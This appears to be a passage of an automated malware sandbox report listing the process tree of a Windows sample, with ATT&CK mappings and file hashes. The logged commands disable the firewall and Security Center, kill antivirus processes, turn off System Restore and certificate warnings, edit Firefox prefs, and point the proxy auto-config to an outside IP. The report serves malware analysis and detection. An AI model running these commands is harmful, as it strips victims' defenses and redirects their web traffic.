        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2408
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1396
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        
        PID:4900
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2216
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1420
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3176
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:832
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
        6⤵
        
        PID:3608
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4700
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4580
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4184
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1908
        
        C:\Windows\SysWOW64\find.exe
        
        find "prefs.js"
        7⤵
        
        PID:4564
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\h0wj385q.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2464
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1596
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
        6⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:232
        
        C:\Windows\SysWOW64\find.exe
        
        find "prefs.js"
        7⤵
        
        PID:876
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\h0wj385q.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3304
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe -r -a -s -h "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1516
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
        6⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1648
        
        C:\Windows\SysWOW64\find.exe
        
        find "prefs.js"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1592
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\h0wj385q.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\prefs.js"
        6⤵
        Views/modifies file attributes
        
        PID:396
      - C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\system32\attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js"
        6⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4664
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
        6⤵
        
        PID:452
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
        6⤵
        
        PID:4500
      - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "Internet Explorer\Main"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1172
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
        6⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
        7⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "S-1-5-21"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2784
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4400
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        
        PID:372
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4688
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKU\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3984
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2892
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
        6⤵
        
        PID:464
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" "http://ver.download-ccf.com/ver.php"
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3816
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3816 CREDAT:17410 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:832
  - - C:\Windows\SysWOW64\net.exe
      net stop wscsvc
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2612
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wscsvc
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4464
  - - C:\Windows\SysWOW64\sc.exe
      sc config wscsvc start= disabled
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:3208
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall set opmode mode=disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4600
  - - C:\Windows\SysWOW64\net.exe
      net stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SharedAccess
        5⤵
        
        PID:3432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgcc.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgcc.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgamsvr.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgupsvc.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgw.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgcc32.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4064
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgctrl.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4968
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgserv.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1376
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgserv9.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3284
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgserv9schedapp.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im avgw.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ashwebsv.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ashdisp.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:948
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ashmaisv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4632
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ashserv.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4580
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ashwebsv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im norton.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Norton Auto-Protect.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:632
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im norton_av.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im nortonav.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2500,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
1⤵
PID:4692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
fb678ed578cc85c2788510c2d3272e4c

SHA1
b7ab05a280d5dd1635f5015fdad52bee5d55a086

SHA256
402f83b861999708fd0b815eaf687d9b438a5140d103c5f5561a55573daf89d4

SHA512
54f960e588a1fd311776233d2d0d42e9612d8e1e1d8715d9121edad25d5f1c1f9dec076768f95282df0412cc31ba6ec2b76543d01cdac663702a29ab4078f0e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
4e927a3e2aea7d80112713ce7ae3c5ed

SHA1
f1e5da2cbee0076ed28901b822c52e380b2744d1

SHA256
42a0c7ea996233b275ddb5af4993849eecb5fd9ef03fcf7aa9a9465e52a5d5d3

SHA512
3ef3dfe87875f569b3fa9be1b12e1b7de6cc482cb6e7c2e3b9462d6f1c0db7c9051a0b1fb2644b656e02d5ade56ee00a6b7dc58d57e3d5f332380956e3ddf235

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0KP8BKDN\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\605B.tmp\arquivo.bat

Filesize
936B

MD5
f1e34cf1c5526c36284cd5d2a3ef7206

SHA1
cac3eadcd17148bb011b6d0f4a79561c471b4009

SHA256
e01d9192143cf6b0605b00b80be30f0398f2692a4a7bb52eb737e649f660dd4c

SHA512
7febedeef66bd3ca00223a090ddbd756a7ebab632da9af1f1dc6ae5d1509bb5ff3e0a0853f35225e1d7fe2a49afa9d81d26713b0224fa1c1997ebaee20570d60

Download Submit
C:\Users\Admin\AppData\Local\Temp\6193.tmp\video.bat

Filesize
5KB

MD5
75de38d95094d4fe4559229ba200f9bd

SHA1
ab949f948430fdb8215e8d65eea8a02295f03125

SHA256
327cb508497a28fc5833ee896cd3f8f068552a1deb1ae9ed2436dbf97aaff727

SHA512
4385b2a05dc4b500b68e5e1b8ebd67b3db2555e5fe07bdddc4295cb0976f6cdf9299b6b51d206d6c11ffdb48c5f388ea63b9c7362fd6c9b6d02d7d2787e78cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\REG6F20.tmp

Filesize
16.1MB

MD5
902d6909a078094ce019abfb50640d1b

SHA1
3d2a2196270f0a0a4b73d9dc64df66af2ced7da8

SHA256
e85537f6783cf048919404599ac2d4017a1891312d9b972c3abd83e77fc7e02f

SHA512
c196893d8570a8a741423fa9ebfb43ad26b5ba12b74b274f46cfb60011b9fdd7129ef5838488eaec76426165af5a0311d46d244e9c105e8d8607d8cac8647c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\arquivo.exe

Filesize
21KB

MD5
b20675bbb62af8db4294ff7eaeae554c

SHA1
69dfadd28ff065fe6eeb49eb9d574b28fb2b6aea

SHA256
25dac9346ab7d09c0655f2e723b17e478ce821e7170934f6ffbf00e779910cf7

SHA512
c078a006998adc3d8e28587f2b60e930a832a9dd12d2c149911e7204dccdf73a097bb71d4afc7c7fbd2a99fb7a018c2769aa69a636ff022c7f19cb8da9cf7e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\ph.exe

Filesize
61KB

MD5
ee8a0f94abf33d5f17cf2f65f0417f94

SHA1
d01e771c0f850bd54cb5e92fe4e7dbab3cf20f9d

SHA256
5dd2d3f78863c50bca677ae611583e3481040eac5c24d9d8fbcda2482331f0cb

SHA512
8f038927934397149b408650655e39b3680d062e1e20f095ac5a2b8109149cd176a32f264af10df592ebbe66e8077f8751fd9b56f4b650f3a85ab146d333c826

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
738B

MD5
750fb8d6ec88ccfb55c61c9c6d2352fe

SHA1
9984d1085b397f5112f899b0fb3265c61790b82d

SHA256
03a0764def16d2e084b6f8d42a842a92d3435861a01527896fe0979d5708bc6a

SHA512
db0f5d40c7c229f7f4744569937176af22ace5d951608982de02a5dcecf4d62eb0c5a0101a9d8e6d3715b7551940f9103a6bc6fc2316e6e729f4552c5bb3622a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\h0wj385q.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\prefs.js

Filesize
556B

MD5
9efd1d60aecbf3990076544345b43154

SHA1
0adaddfca5ed9f0dd1007b81792660718ab02876

SHA256
80429f97cc567ded0112e93f05e1fea498a4e804d6b19dc085286324bea7d23c

SHA512
88e92f1c509e265ea77e25fb958ac9a8aa66d6487559866ba8c46ea363c6914f927905b7a27177ada400b89a0a60965b9221f1bff85be2495c694ec08c962e92

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\h0wj385q.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\prefs.js

Filesize
594B

MD5
8fbb2ad5b62c52c4a5a00e7102af1d3f

SHA1
3be609791810fe8c3d9d8ad205ab6e30404097c5

SHA256
cd80cd78f4427f0f3c24e4947306216738dc3aebd7e35a817427ab56316700d0

SHA512
8015f5d080a001fc98b82cc2f295f8e647ad9dec48b914916fdc0685f11a707dd652a4f360d509e7818370f7d7584f4a68479a4bef711355dd7738b688b5bb4c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js

Filesize
11KB

MD5
fa37700fedc826b00ee43e5d346cca19

SHA1
bf9b03044d77a7f34f6286ff0bac7cbcefed1d28

SHA256
25f61709f7339a9f9592c96362f39686224889f6dbce3ed23c958a4e8104ad87

SHA512
8adbc6fbdd7941bd74642f1481a967894601f79cb453a3e3905df480da531ce5e1f2c64bf7dd5e93742460ed7c03493348388696961b3f84bac3565f73c228a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js

Filesize
11KB

MD5
b80be4a0162bede44d9a2630a8aea681

SHA1
f86eff1a2a33191ced3e41d126f97051f47c7697

SHA256
1fe964e284c9c62422d04de6ca8f6639b470b96e969155ac78268ccdbd0e4171

SHA512
3485c4bfc48985448d8a6dd57fb8e1a65973c03ae8517888ddc243f5be6fb0b35058ea18fef4c368cc80ddb527789f007b70c42229211f48d4bce5d0348fe839

Download Submit
memory/1528-68-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1528-18-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2952-59-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2952-11-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads